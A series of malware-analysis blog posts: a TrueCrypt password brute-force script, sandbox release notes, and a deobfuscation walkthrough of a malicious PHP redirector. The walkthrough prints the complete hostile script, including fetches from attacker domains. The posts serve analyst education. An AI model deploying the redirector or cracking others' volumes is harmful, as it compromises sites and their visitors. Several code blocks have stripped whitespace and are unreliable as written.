Take the case of an agent who says: "The password is Volleyball. We know the first letter is capitalized, and the rest is in leet speak." Based on this, I write a leet-speak character substitution routine:


def leet_lookup(char):
list = {"a": ["a","A","@"],
"b": ["b", "B", "8"],
"c": ["c", "C", "<"],
"e": ["e", "E", "3"],
"i": ["i", "I", "1"],
"l": ["l", "L", "1"],
"o": ["o", "O", "0"],
"t": ["t", "T", "7"] }
try:
result = list[char.lower()]
except KeyError:
result = [char.lower(), char.upper()]
return result


This little routine lets us create a list of possible substitutions for each byte value. If the specified byte isn't declared, it just returns the upper and lower case version of it.

Now, we put this into action here:

import os
import subprocess

tc_exe = "C:\\Program Files\\TrueCrypt\\truecrypt.exe"
tc_file = "E:\\test.tlc"
drive_letter = "P"

def leet_lookup(char):
list = {"a": ["a","A","@"],
"b": ["b", "B", "8"],
"c": ["c", "C", "<"],
"e": ["e", "E", "3"],
"i": ["i", "I", "1"],
"l": ["l", "L", "1"],
"o": ["o", "O", "0"],
"t": ["t", "T", "7"] }
try:
result = list[char.lower()]
except KeyError:
result = [char.lower(), char.upper()]
return result
list = []
# V o l l e y b a l l = 10 chars
for c1 in leet_lookup('v'):
for c2 in leet_lookup('o'):
for c3 in leet_lookup('l'):
for c4 in leet_lookup('l'):
for c5 in leet_lookup('e'):
for c6 in leet_lookup('y'):
for c7 in leet_lookup('b'):
for c8 in leet_lookup('a'):
for c9 in leet_lookup('l'):
for c10 in leet_lookup('l'):
list.append("%s%s%s%s%s%s%s%s%s%s" % (c1, c2, c3, c4, c5, c6, c7, c8, c9, c10))
print "%d passwords calculated. Now testing:" % len(list)

count = 0
for password in list:
count += 1
if not count % 10: print ".",
tc_cmdline = "%s %s /l %s /b /a /m ro /q /s /p %s" % (tc_exe, tc_file, drive_letter, password)
process = subprocess.Popen(tc_cmdline)
returncode = process.wait()
if not returncode:
close_cmdline = "%s /d /l %s /q /s" % (tc_exe, drive_letter)
process = subprocess.Popen(close_cmdline).wait()
print "\r\nPassword found: %s" % password
quit()

The main portion is where we specify the 10 character of Volleyball (which I'm sure could be written cleaner with a Python lambda, but ain't nobody got time for that). This script will try every permutation of Volleyball against a file named "E:\test.tlc", mounting it to drive letter "P:" if successful.


In action, there were 26,244 possible permutations of the file, with a dot written for every 10 tests. After 30 minutes of testing, the correct one was found to be:  V0ll3ybal1



A copy of this code can be found as a GitHub Gist at: https://gist.github.com/Rurik/5521081

Additionally, the same concept can be applied to other products, such as RAR or ZIP password archives.

Noriben Version 1.2 released

$
0
0
In a mad rush of programming while on a plane to BSidesNOLA, and during the conference, I completed a large number of updates, requests, and demands for Noriben.

As a basic malware analysis sandbox, Noriben was already doing a great job in helping people analyze malware more quickly and efficiently. However, it had its bugs that hurt a few outlier cases. Using submitted feedback (through email, twitter, oral, and death threats) I believe that the major issues have been fixed and that the most-needed features have been added.

New Improvements:

  • Timeline support -- Noriben now automatically generates a "_timeline.csv" report that notes all activity in chronological order, with fields for local time and a grouping category. Feedback is welcome for ways to improve this output. For example:
8:16:19,Network,UDP Send,hehda.exe,2520,83.133.123.20:53
8:16:19,File,CreateFolder,hehda.exe,2520,C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\L
8:16:19,File,CreateFolder,hehda.exe,2520,C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\U
8:16:19,File,CreateFile,hehda.exe,2520,C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\@,a7d89e4e5ae649d234e1c15da6281375
8:16:19,File,CreateFile,hehda.exe,2520,C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\n,cfaddbb43ba973f8d15d7d2e50c63476
8:16:19,Registry,RegCreateKey,hehda.exe,2520,HKCU\Software\Classes\clsid
8:16:19,Registry,RegCreateKey,hehda.exe,2520,HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}
8:16:19,Registry,RegCreateKey,hehda.exe,2520,HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32
8:16:19,Registry,RegSetValue,hehda.exe,2520,HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32\ThreadingModel,Both
8:16:19,Registry,RegSetValue,hehda.exe,2520,HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32\(Default),C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\n.
8:16:19,Registry,RegDeleteValue,hehda.exe,2520,HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender
  • Tracks registry deletion attempts -- Older versions only tracked successful deletions to the registry, assuming that the keys and values existed. Now, it logs even when the keys don't exist. This opened up a large amount of data that was previously filtered out, such as ZeroAccess removing the services for Windows Defender and Microsoft Update (which weren't running on my analysis VM).
  • Large CSV support -- The old versions of Noriben read the entire procmon CSV into memory and then parsed them for results. This created numerous Out of Memory issues with very large sample files. The new version fixes this by only reading in the data one line at a time.
  • Parse Procmon PMLs -- PML files are the binary database used to store the native events during capture. These are converted to CSVs during runtime, but a number of users have years worth of saved PMLs for previous malware samples. Now, Noriben can just parse an existing PML without having to re-run the malware.
  • Alternate Filter files -- Previous versions of Noriben required that you use one filter file, ProcmonConfiguration.PMC, to store your filters. This created issues for users who maintained multiple filters. A new command line option has been added to specify a filter file. This can be used in conjunction with the "-p" PML parsing option to rescan an existing PML with new filters.
  • Global Blacklists -- There was a need for a global blacklist, where items contained in it (namely executables) would be blocked from all blacklists. That allows for a blacklisted item that doesn't have to be manually added to each and every list. 
  • Error Logging -- In a few unusual cases, Noriben fails to parse an event item from the CSV. While Noriben contains proper error handling to catch these issues, it just drops them and moves on. As these events may contain important items, they are now stored in raw at the end of the Noriben text report for manual analysis. If something looks amiss, and they are extremely important items, the list can be emailed to me for analysis and better handling in future versions.
  • Compartmentalized sections -- This is mostly a back-end, minor feature, All events are now grouped into separate lists for Process, File, Registry, and Network. 

General fixes:

  • Changed "open file" command for Mac OS X to 'open'. OS X is tagged as 'posix'. This allows for Noriben to parse files from a Mac interface, but this is not recommended. Parsing files on a system other than the infected means that system environment variables, such as %UserProfile%, will not be identified correctly.
Noriben has changed its command line arguments, dropped the '-r' (rescan CSV) and introduced more specific arguments per each file type, '-c' (CSV), '-p' (PML), and '-f' (filter):

--===[ Noriben v1.2 ]===--
--===[   @bbaskin   ]===--

usage: Noriben.py [-h] [-c CSV] [-p PML] [-f FILTER] [-d]

optional arguments:
  -h, --help                   show this help message and exit
  -c CSV, --csv CSV            Re-analyze an existing Noriben CSV file [input file]
  -p PML, --pml PML            Re-analyze an existing Noriben PML file [input file]
  -f FILTER, --filter FILTER   Alternate Procmon Filter PMC [input file]
  -d                           Enable debug tracebacks

How To: Static analysis of encoded PHP scripts

$
0
0
This week, Steve Ragan of CSO Online posted an article on a PHP-based botnet named by Arbor Networks as Fort Disco. As part of his analysis, Ragan posted an oddly obfuscated PHP script for others to tinker with, shown below:

<?$GLOBALS['_584730172_']=Array(base64_decode('ZXJy'.'b'.'3JfcmVw'.'b'.'3J0aW5n'),base64_decode('c'.'2V0X3RpbWV'.'fbGl'.'taXQ'.'='),base64_decode(''.'ZG'.'Vma'.'W'.'5l'),base64_decode(''.'ZGlyb'.'mFtZQ=='),base64_decode('ZGVm'.'aW5l'),base64_decode(''.'d'.'W5saW5r'),base64_decode('Zml'.'sZ'.'V9le'.'G'.'lzdHM='),base64_decode('dG91Y2'.'g='),base64_decode('aXNfd3J'.'p'.'dGFibGU='),base64_decode('dHJ'.'p'.'bQ=='),base64_decode('ZmlsZ'.'V9nZXRf'.'Y29udGVud'.'HM='),base64_decode('dW5s'.'aW5r'),base64_decode('Zm'.'lsZ'.'V9nZXRf'.'Y2'.'9u'.'dGVudHM='),base64_decode('d'.'W5'.'saW5r'),base64_decode('cH'.'JlZ19'.'tYX'.'Rj'.'aA=='),base64_decode('aW1wb'.'G9kZ'.'Q=='),base64_decode('cHJlZ19t'.'YXRja'.'A=='),base64_decode('a'.'W1w'.'bG9k'.'Z'.'Q=='),base64_decode('Zml'.'s'.'ZV'.'9nZXRfY'.'29'.'udGV'.'udH'.'M='),base64_decode('Z'.'m9w'.'ZW4='),base64_decode(''.'ZmxvY'.'2'.'s'.'='),base64_decode('ZnB1'.'dH'.'M='),base64_decode('Zmx'.'vY'.'2s'.'='),base64_decode('Zm'.'Nsb3'.'Nl'),base64_decode('Z'.'mlsZV9leG'.'lzdH'.'M='),base64_decode('dW5zZX'.'JpYWx'.'pemU='),base64_decode('Z'.'mlsZV9nZXRfY29udGVu'.'dHM='),base64_decode('dGlt'.'ZQ'.'='.'='),base64_decode('Zm'.'ls'.'Z'.'V9n'.'ZX'.'RfY29'.'ud'.'GVu'.'dHM='),base64_decode('d'.'GltZ'.'Q=='),base64_decode('Zm9w'.'ZW4='),base64_decode('Zmx'.'vY2s='),base64_decode(''.'ZnB1dHM='),base64_decode('c2VyaWFsaX'.'pl'),base64_decode('Zm'.'xvY2s='),base64_decode('ZmNsb'.'3N'.'l'),base64_decode('c'.'3Vic3Ry'),base64_decode(''.'a'.'GVhZGVy'),base64_decode('aGVhZGV'.'y'));?><?function_1348942592($i){$a=Array('aHR0cDovL2dheWxlZWNoZXIuY29tOjgx','cXdlMTIz','cXdlMTIz','MTIzcXdl','Uk9PVA==','Lw==','TE9H','b2xvbG8udHh0','L2lmcmFtZS50eHQ=','dGVzdA==','d29yaw==','Tk8gV09SSywgTk9UIEdFVCBVUkw=','Tk8gV09SSywgTk9UIFdSSVRJQkxF','YWFh','YWFh','YWFh','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','YmJi','YmJi','Y2Nj','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','TnVsbCBjb3VudCBvaw==','RVJST1IgbnVsbCBjb3VudCgo','SFRUUF9VU0VSX0FHRU5U','TVNJRQ==','RmlyZWZveA==','T3BlcmE=','V2luZG93cw==','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','dw==','L2lmcmFtZTIudHh0','aHR0cDovL3lhLnJ1Lw==','c2V0dGluZ3MuanNvbg==','c2V0dGluZ3MuanNvbg==','bGFzdA==','dXJs','bGFzdA==','dXJs','bGFzdA==','c2V0dGluZ3MuanNvbg==','dw==','dXJs','dXJs','aHR0cA==','aHR0cDovLw==','Lw==','SFRUUC8xLjEgNDA0IE5vdCBGb3VuZA==');returnbase64_decode($a[$i]);}?><?php$GLOBALS['_584730172_'][0](round(0));$GLOBALS['_584730172_'][1](round(0));$_0=_1348942592(0);if(isset($_GET[_1348942592(1)])AND$_GET[_1348942592(2)]==_1348942592(3)){$GLOBALS['_584730172_'][2](_1348942592(4),$GLOBALS['_584730172_'][3](__FILE__)._1348942592(5));$GLOBALS['_584730172_'][4](_1348942592(6),ROOT._1348942592(7));@$GLOBALS['_584730172_'][5](LOG);if(!$GLOBALS['_584730172_'][6](LOG)){@$GLOBALS['_584730172_'][7](LOG);if($GLOBALS['_584730172_'][8](LOG)AND$GLOBALS['_584730172_'][9]($GLOBALS['_584730172_'][10]($_0._1348942592(8)))==_1348942592(9)){@$GLOBALS['_584730172_'][11](LOG);echo_1348942592(10);}else{echo_1348942592(11);}}else{echo_1348942592(12);}exit;}if(isset($_GET[_1348942592(13)])AND$_GET[_1348942592(14)]==_1348942592(15)){$_1=$GLOBALS['_584730172_'][12]($_SERVER[_1348942592(16)]._1348942592(17));echo$_1;exit;}if(isset($_GET[_1348942592(18)])AND$_GET[_1348942592(19)]==_1348942592(20)){if($GLOBALS['_584730172_'][13]($_SERVER[_1348942592(21)]._1348942592(22))){echo_1348942592(23);}else{echo_1348942592(24);}exit;}if(!empty($_SERVER[_1348942592(25)])){$_2=array(_1348942592(26),_1348942592(27),_1348942592(28));$_3=array(_1348942592(29));if($GLOBALS['_584730172_'][14](_1348942592(30).$GLOBALS['_584730172_'][15](_1348942592(31),$_2)._1348942592(32),$_SERVER[_1348942592(33)])){if($GLOBALS['_584730172_'][16](_1348942592(34).$GLOBALS['_584730172_'][17](_1348942592(35),$_3)._1348942592(36),$_SERVER[_1348942592(37)])){$_4=@$GLOBALS['_584730172_'][18]($_SERVER[_1348942592(38)]._1348942592(39));if($_4==_1348942592(40)or$_4==false)$_4=round(0);$_5=@$GLOBALS['_584730172_'][19]($_SERVER[_1348942592(41)]._1348942592(42),_1348942592(43));@$GLOBALS['_584730172_'][20]($_5,LOCK_EX);@$GLOBALS['_584730172_'][21]($_5,$_4+round(0+1));@$GLOBALS['_584730172_'][22]($_5,LOCK_UN);@$GLOBALS['_584730172_'][23]($_5);$_6=$_0._1348942592(44);$_7=round(0+300);$_8=_1348942592(45);if(!$_6)exit();$_9=$GLOBALS['_584730172_'][24](_1348942592(46))?$GLOBALS['_584730172_'][25]($GLOBALS['_584730172_'][26](_1348942592(47))):array(_1348942592(48)=>round(0),_1348942592(49)=>$_8);if($_9[_1348942592(50)]<$GLOBALS['_584730172_'][27]()-$_7){if($_9[_1348942592(51)]=$GLOBALS['_584730172_'][28]($_6)){$_9[_1348942592(52)]=$GLOBALS['_584730172_'][29]();$_10=$GLOBALS['_584730172_'][30](_1348942592(53),_1348942592(54));$GLOBALS['_584730172_'][31]($_10,LOCK_EX);$GLOBALS['_584730172_'][32]($_10,$GLOBALS['_584730172_'][33]($_9));$GLOBALS['_584730172_'][34]($_10,LOCK_UN);$GLOBALS['_584730172_'][35]($_10);}}$_11=$_9[_1348942592(55)]?$_9[_1348942592(56)]:$_8;if($GLOBALS['_584730172_'][36]($_11,round(0),round(0+1+1+1+1))!=_1348942592(57))$_11=_1348942592(58).$_11._1348942592(59);$GLOBALS['_584730172_'][37]("Location: $_11");exit;}}}$GLOBALS['_584730172_'][38](_1348942592(60));?>

As a fan of obfuscation, this clearly piqued my interest. The initial question was what was contained within all of the Base64 sections, but let's examine this holistically.  At a high level view, there are three distinct sections to this code block, with the beginning of each underlined in the code above. Each can also be identified as beginning with "<?".




The "<? $GLOBALS['_584730172_']" section creates an array of multiple Base64-encoded function values. As each item is called by the code, base64_decode will run on its value and return actual text. By hand picking a few of these to test, they all return known PHP function names:
base64_decode('ZXJy'.'b'.'3JfcmVw'.'b'.'3J0aW5n') resolves to "error_reporting"
base64_decode('c'.'2V0X3RpbWV'.'fbGl'.'taXQ'.'=') resolves to "set_time_limit"
The actual Base64 encoded values are further obfuscated by breaking up the string into multiple segments and rejoining them with the PHP ".". As many stateful inspection devices may block PHP that contains a call of "preg_match", bad guys will normally Base64 encode it. But, devices can also search for the Base64 values of bad calls. So, to avoid this, the obfuscator code (not seen here) will randomly break up the text into chunks that are difficult for an automated device to piece back together.

Knowing that the "$GLOBALS['_584730172_']" resolves function names, we can analyze it in code with context. "$GLOBALS['_584730172_'][0]" will extract the first function name from the array ("error_reporting") and execute it in-place. We know that we need to just replace these calls with their actual Base64 decoded values. This can be done manually, but we'll do it automatically later.

The second section of the code is a function:
<?function_1348942592($i){

This function is doing the same thing as the "$GLOBALS['_584730172_']", but in a different manner. When passed a number, the function finds its corresponding value in an array and Base64 decodes it. When looking through these we see that they're the string values associataed with the code:
'aHR0cDovL2dheWxlZWNoZXIuY29tOjgx'resolves to "http://gayleecher.com:81"
'cXdlMTIz'resolves to "qwe123"

We see these strings substituted within the code as function calls like:
$_0=_1348942592(0);

Just as with the function names, we'll want to replace these calls with their respective strings in the code. 

And, finally, that leaves us with the actual code itself. By itself, it's not possible to analyze this without the function names and strings. You could manually replace the calls with the appropriate values, but it could also be done automatically. While in a hotel for an incident response, and waiting for my colleagues to prepare for dinner, I whipped up a very ugly decoder in Python. I've taken the time to clean it up a bit, shown below:

importbase64
script="""
<<script>>
"""

functions=[]
strings=[]

# Split the script into its three segments (functions, strings, code).
sections=script.split("<?")
function_section=sections[1]
string_section=sections[2]
code="<?"+sections[3]

# Parse through each value, separated by base64_decode call.
forentryinfunction_section.split("base64_decode"):
# Skip the initial entry as it contains no value.
if"GLOBALS"inentry:
continue
# Remove the string concatenations
entry=entry.replace("' .'","")
# Split on single quote to get the Base64 value contained within the quotes.
function=entry.split("'")[1]
# Append new function mame into array
functions.append(base64.b64decode(function))

forentryinstring_section.split(","):
entry=entry.split("'")[1]
strings.append(base64.b64decode(entry))

# Now start replacing function calls with true values. We split on the call to
# acquire each index number, then replace.
code_lines=code.split("$GLOBALS['_584730172_']")
forline_numinrange(1,len(code_lines)):
line=code_lines[line_num]
# Ensure the index call, [x], is in the string before going on.
ifnot"["inline:
continue
# Extract the index number, pull the function from the array.
codenum=line.split("[")[1].split("]")[0]
func=functions[int(codenum)]
# Recreate the array string and replace it in the code.
s="$GLOBALS['_584730172_'][%s]"%codenum
code=code.replace(s,func)

# Now start replacing strings with true values.
code_lines=code.split("_1348942592")
forline_numinrange(1,len(code_lines)):
line=code_lines[line_num]
ifnot"("inline:
continue
codenum=line.split("(")[1].split(")")[0]
string=strings[int(codenum)]
s="_1348942592(%s)"%codenum
code=code.replace(s,"'"+string+"'")

# Print the final code.
printcode

The resulting code has another slight level of obfuscation: no carriage returns or spacing. This is easily resolved by submitting the code to an online code cleaner, such as PHP Code Cleaner. This results in the original code which is much easier to analyze:


<?php
error_reporting(round(0));
set_time_limit(round(0));
$_0='http://gayleecher.com:81';

if(isset($_GET['qwe123'])AND$_GET['qwe123']=='123qwe'){
define('ROOT',dirname(__FILE__).'/');
define('LOG',ROOT.'ololo.txt');
@unlink(LOG);

if(!file_exists(LOG)){
@touch(LOG);

if(is_writable(LOG)ANDtrim(file_get_contents($_0.'/iframe.txt'))=='test'){
@unlink(LOG);
echo'work';
}else{
echo'NO WORK, NOT GET URL';
}
}
else{
echo'NO WORK, NOT WRITIBLE';
}
exit;
}

if(isset($_GET['aaa'])AND$_GET['aaa']=='aaa'){
$_1=file_get_contents($_SERVER['SCRIPT_FILENAME'].'.count');
echo$_1;
exit;
}

if(isset($_GET['bbb'])AND$_GET['bbb']=='ccc'){
if(unlink($_SERVER['SCRIPT_FILENAME'].'.count')){
echo'Null count ok';
}else{
echo'ERROR null count((';
}
exit;
}


if(!empty($_SERVER['HTTP_USER_AGENT'])){
$_2=array('MSIE','Firefox','Opera');
$_3=array('Windows');

if(preg_match('/'.implode('|',$_2).'/i',$_SERVER['HTTP_USER_AGENT'])){
if(preg_match('/'.implode('|',$_3).'/i',$_SERVER['HTTP_USER_AGENT'])){
$_4=@file_get_contents($_SERVER['SCRIPT_FILENAME'].'.count');
if($_4==''or$_4==false)$_4=round(0);
$_5=@fopen($_SERVER['SCRIPT_FILENAME'].'.count','w');
@flock($_5,LOCK_EX);
@fputs($_5,$_4+round(0+1));
@flock($_5,LOCK_UN);
@fclose($_5);
$_6=$_0.'/iframe2.txt';
$_7=round(0+300);
$_8='http://ya.ru/';

if (!$_6) exit();
$_9 = file_exists('settings.json') ? unserialize(file_get_contents('settings.json')) :array('last'=>round(0),'url'=>$_8);

if($_9['last']<time()-$_7){
if($_9['url']=file_get_contents($_6)){
$_9['last']=time();
$_10=fopen('settings.json','w');
flock($_10,LOCK_EX);
fputs($_10,serialize($_9));
flock($_10,LOCK_UN);
fclose($_10);
}
}
$_11 = $_9['url'] ? $_9['url'] : $_8;
if(substr($_11,round(0),round(0+1+1+1+1))!='http')$_11='http://'.$_11.'/';
header("Location: $_11");
exit;
}
}
}
header('HTTP/1.1 404 Not Found');
?>

Let's walk through this a bit. The code has multiple paths, depending on various inputs. These inputs are passed along as URI values

if(isset($_GET['qwe123'])AND$_GET['qwe123']=='123qwe'){

This line is responsible for checking for a URI field named "qwe123", such as:

http://www.website.com/a.php?qwe123=123qwe

If that field contains the value "123qwe", then this section of code is executed. This section looks for a file named "ololo.txt" in the same directory as the malicious code and, if found, deletes it (unlink()). If this doesn't work, it displays "NO WORK, NOT WRITABLE" in the web session. This file exists solely for the code to determine if it has write permissions to the folder via the web. It also ensures that it can browse to the malicious domain by retrieving hxxp://gayleecher.com:81/iframe.txt and ensuring that this file contains the text "test".

if(isset($_GET['aaa'])AND$_GET['aaa']=='aaa'){

This line checks for a URI field named "aaa" and ensures it contains the value of "aaa". If so, it will retrieve the code's current file name, append ".count" to the end of the name, and determine if that file exists in the current web folder. For example, a.php would look for a.php.count. If it exists, the contents will be displayed in the web session.

if(isset($_GET['bbb'])AND$_GET['bbb']=='ccc'){

This line checks for a URI field named "bbb" and ensures it contains the value of "ccc". If so, it will locate the aforementioned .count file and delete it.

Lacking any submitted values, the code performs its default routine. This begins by using ensuring that the visitor is using a Windows-based machine running Internet Explorer, Firefox, or Opera based upon the browser's user-agent. The code then updates its ".count" file to increment the counter by one. A request is then made to retrieve the contents of hxxp://gayleecher.com:81/iframe2.txt. This file currently contains:

http://s2s2s2.in/?id=123

Afterward is a line that would confuse many not familiar with ternary logic commands:

$_9 = file_exists('settings.json') ? unserialize(file_get_contents('settings.json')) :array('last'=>round(0),'url'=>$_8);

A ternary operation checks a logical condition to see if it is true or false. If true, it returns one set data; if false, another.

result = condition ? result_true : result_false

In this case, does the file "settings.json" exist? If so, then read the contents through unserialize() (which takes raw data and forms it into logical arrays) and place the resulting arrays into $_9. If "settings.json" does not exist, then create a new array with a "url" field that contains $_8 ("http://ya.ru").

The "url" field in this array is then set to the contents of the iframe2.txt file above, and the "last" field set to the current date and time as an epoch value. The values are then written to "settings.json".

Another aspect of this is the time frequency of connections. This can be determined by examining the following lines:
$_7=round(0+300);
if($_9['last']<time()-$_7){

This code sets $_7 to "300", with the "round(0" as cruft code that can be ignored. The same then checks to see if the "last" visit time is less than the current time (as an epoch) minus 300 seconds, or 5 minutes. In essence, if it's been longer than 5 minutes since checking in with iframe2.txt, the sample will check in to acquire the latest URL to connect to.

Later logic ensures that there is a URL set. If not, it will default to the hardcoded address of "http://ya.ru". For additional checking, the sample then ensures that the sample begins with the text "http". If not, it prepends it to create a valid URL:

if(substr($_11,round(0),round(0+1+1+1+1))!='http')$_11='http://'.$_11.'/';

The point to this entire script comes at the very end:

header("Location: $_11");

This is a slightly obscure PHP call that appends a raw HTTP header field to the outgoing response. In this case, it adds a "Location: " field used to redirect the client to a new web site.

So let's sit back and take in what we know.

This is an obfuscated PHP code that sits on a web server. When visited by a home user, the code will query gayleecher.com to retrieve a redirect URL. It saves this to a local file named "settings.json" and then redirects the home user to the same URL. All the while, a counter is being saved in the background that logs how many total home users are redirected. The actor can query this information by passing certain arguments to see how many total users were redirected.

At this time, all users are redirected to:

http://s2s2s2.in/?id=123

I hope this was insightful to anyone learning web attack analysis. I am a big fan of obfuscation, encoding, and encryption and love to tear apart such samples. As I've joked about, this is like Sudoku as a relaxing yet challenging exercise that more people should learn :)

Mojibaked Malware: Reading Strings Like Tarot Cards

$
0
0
One notable side effect to working in intrusions and malware analysis is the common and frustrating exposure to text in a foreign language. While many would argue the world was much better when text fit within a one-byte space, dwindling RAM and hard drive costs allowed us the extravagant expense of using TWO bytes to represent each character. The world has yet to recover from the shock of this great invention and modern programmers cry themselves to sleep while fighting with Unicode strings.

For a malware analyst, this typically comes about while analyzing code that's beyond the standard trojan, which typically contains no output. Analyzing C2 clients (servers in other contexts) and decoy documents require being able to identify the correct code page for strings so that they appear correctly, can be attributed to a language, and can then be translated.

ASCII is the range of bytes from 0-255, which occupy one byte of storage. UTF-8 extends upon this by using single-byte where possible, but also allowing variable-length bytes that are mathematically calculated to determine the correct byte to use. If you see a string of text that looks like ASCII, but then randomly contains unknown characters, it is likely UTF-8, such as:

C:\users\brian\樿鱼\malware.pdb

Code pages, UTF-16, and even UTF-32, provide additional challenges by providing little context to the data involved. However, I hope that by this point in 2013 we don't need to continually harp on what Unicode is...

For most analysts, their exposure to Unicode is being confronted with unknown text, and then trying to figure out how to get it back into its original language. This text, when illegible, is known as mojibake, a Japanese term for "writing that changes". The data is correct, and it does mean something to someone, but the wrong encoding is being applied. This results in text that looks, well... wrong.

Most analysts have gotten into the habit of searching for unknown characters then guessing which code page or encoding to apply until they produce something that looks legible. This does eventually work, but is a clumsy science. We all have our favorites to try: GB2312, Big5, Cyrillic, 8859-2, etc. But, let's just keep this short and sweet and show you a tool that your peers likely already know about but forgot to show you.



Many times unknown data is found directly in the middle of known text, such as:

C:\users\brian\樿鱼\malware.pdb

That small section of unknown data in the middle is mojibake. The problem you'll find is that if this string of text is stored within a binary file, such as an executable, using a tool like 'strings' will miss it. 'strings' will instead return two strings: "C:\users\brian\" and "malware.pdb", completely missing the folder name that's UTF-8 Chinese. 

My preferred method for dealing with these is to simply paste the string into Notepad++. It can natively translate to UTF-8 or various code pages on the fly. Just make sure that you're in ANSI mode when you paste it in.

For graphical applications it's a bit more difficult. Take, for instance, these series of texts from a malware C2 client:


This is mojibake. The standard way that most people get around this issue is to identify the code page from the application, usually by using an application like ExifTool, setting their system to use that language pack as the primary, then rebooting and running the application again. This works, but is cumbersome. Others take VM snapshots of their analysis system in various languages, then just revert to the appropriate language to extract the language strings as needed.

The problem deepens when an application has a mixture of correct strings alongside mojibake strings, such as this program does:


The proper strings are the result of the program containing a String/Dialog resource with appropriate language settings applied. This program, viewed with Cerbero's PEInsider, showed Menus and Dialogs with proper settings applied (2052 - Chinese Simplified):


However, for its string table, the application feature virtually no entries at all. Just a string of "A" and "B".



This provides part of the picture, but doesn't encompass all of the strings we may run across, especially for those created dynamically at runtime.

The preferred way is to use a little-known, but also widely-known, Microsoft tool named AppLocale. AppLocale will run an application in a specific, chosen code page and provide native translation. All that is required is for you to have the appropriate language pack installed, without having to make it the OS's primary language.

However, there are multiple issues with AppLocale. It's a GUI loader that displays the supported languages in their native written format, as shown below, making it impossible to know which is which unless you already know the language.


Good luck with that. Especially when you jump between eight languages in a given week.

AppLocale does allow for command line execution, but requires you to know a specific four-digit code page number. A number that's based on Microsoft's Locale ID that's relatively unknown to outsiders. For instance, with Simplified Chinese, they use Locale ID 0804 instead of the universally known 2052.

To simplify the process, I threw together a quick script over the weekend that provided the full selection of Locale IDs, from which one is selected. It then creates a new option on the right-click context menu for executable files. That's it, nothing major.

The effect is instantaneous though. Edit the script and uncomment the language of your choice, then run the script as an account with administrative access. From there, you can simply right click on any executable and select "Execute with AppLocale". The applications should then show up in their native language without any reboots, like our text below from the earlier C2 client:


Note: If instead of the program running, AppLocale gives you a setup window, then you likely do not have that specified language pack installed.

Software:
Microsoft AppLocale: http://www.microsoft.com/en-us/download/details.aspx?id=13209
RightClick_AppLocale: https://github.com/Rurik/RightClick_AppLocale/blob/master/RCAppLocale.py



Further Fun Reading:
Do You want Coffee with That Mojibakehttp://iphone.sys-con.com/node/44480
Unicode Search of Dirty Data, Or: How I Learned to Stop Worrying and Love Unicode Technical Standard #18  Slide Deck (PDF)  |  White Paper
Russian Post Office fixes mojibake on the flyhttp://en.wikipedia.org/wiki/File:Letter_to_Russia_with_krokozyabry.jpg

Malware Analysis: The State of Java Reversing Tools

$
0
0
In the world of incident response and malware analysis, Java has always been a known constant. While many malware analysts are monitoring more complex malware applications in various languages, Java is still the language of love for drive-by attacks on common end-users. It is usually with certainty that any home user infection with malware such as Zeus, Citadel, Carberp, or ZeroAccess originated through a Java vulnerability and exploit. In typical crimeware (banking/financial theft malware) incidents, one group specializes on the backend malware (e.g. Zeus) while outsourcing the infection and entrenchment to a second group that creates exploit software like BlackHole, Neosploit, and Fiesta.

In many incident responses, I've seen analysts gloss over the Java infection vector as just an end-note. Once they see the final-stage malware on the system they write off the Java component as just a downloader without any real analysis. This creates issues for the times when the Java exploit only partially succeeds resulting in malicious Java JAR files on a system but no Trojan or malware.

Why did it fail? Was the system properly patched to prevent a full infection? Was there a permission setting that stopped the downloader in its tracks? These are the questions that typically force an analyst to begin analyzing Java malware.

I've discussed Java quite a bit on this blog in the past. My Java IDX cache file parser was made for the purpose of identifying files downloaded via Java, be them Windows executables or additional Java JAR files. In that same post I analyzed Java from a Fiesta exploit kit that installed a ZeroAccess trojan onto an analyzed system.

Though Java is not my forte, I've had to face it enough to find that there are many weaknesses and gaps in the tools used for analysis. What I found is that most analysts have been using the same, outdated tools in every case. If the tool fails, they just move on and don't finish their analysis. All the while, new applications are being released that are worthy of note. I felt it worthy to do an annual check-up of the state of analysis tools to display what is available and what weaknesses each holds. There have been similar efforts by others in the past, with the most recent I've found being one in 2010 on CoffeeBreaks, by Jerome.


This post was intended to be much larger and in-depth, delving into how each analysis tool manages decompilation and why they fail, but due to time and resources it was cut short.

The Setup

For this comparison I will be using code from a Java RAT that is in active development. Due to this active development, I will not name the RAT nor provide any files for download.

The malware used is obfuscated by a well-known Java obfuscation tool named Zelix KlassMaster (ZKM). ZKM has been discussed widely in the industry for years and I gave a presentation on how to identify and reverse its string encryption at a NoVA Hackers! (NoVAH!) meeting in May of 2012.

Due to this obfuscation we will be matrixing the results into decompilers match with two well known Java deobfuscators: JMD and JDO.

As it seems to be common with all Java analysis tools, many discussed here are no longer in development and have been left abandoned. However, in many cases, they still work for a majority of malicious samples.

Deobfuscators:
Deobfuscators work by detecting known obfuscation methods, such as renaming variables, classes, and functions, as well as basic string encoding. While many of these are methods are specific to known obfuscators, generic deobfuscation can be performed by searching for a routine that runs against encoded strings, then calling that routine externally against the strings.

JMDis one open-source deobfuscator, written in Java, but also available as a .NET 2.0 (64-bit d/l) executable. It runs directly against a JAR file and produces a deubfuscated JAR as a result. It provides the following deobfuscation methods:
  • Allatori
  • DashO
  • Generic string encoding
  • JShrink
  • SmokeScreen
